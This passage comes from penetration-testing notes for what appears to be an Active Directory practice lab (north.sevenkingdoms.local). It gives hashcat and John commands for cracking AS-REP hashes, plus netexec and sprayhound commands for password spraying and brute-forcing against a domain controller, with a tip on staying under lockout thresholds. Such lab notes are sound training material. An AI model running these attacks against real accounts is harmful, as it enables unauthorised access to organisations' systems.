Note the trailing / when specifying the domain, north.sevenkingdoms.local.
Hashcat
hashcat -m 18200 ASREPhash /usr/share/wordlists/rockyou.txt
John
john --wordlist=/usr/share/wordlists/rockyou.txt ASREPhash_john
Password Spray
Check whether any users are using their username as their password (e.g. admin:admin, john:john).
Netexec
nxc smb 192.168.56.11 -u nullinux_users.txt -p nullinux_users.txt --no-bruteforce --continue-on-success
Sprayhound
https://github.com/Hackndo/sprayhound
Bruteforce
sprayhound -U nullinux_users.txt -d north.sevenkingdoms.local -dc 192.168.56.11 --lower
Note: Use sparingly as this will increment badpwdcount (see below).
Bruteforce w/ Valid User
This method makes use of a valid user to retrieve the password policy (-lu and -lp). It also stops attempting a user once that account has 2 attempts left before lockout (-t 2).
sprayhound -U nullinux_users.txt -d north.sevenkingdoms.local -dc 192.168.56.11 -lu hodor -lp hodor --lower -t 2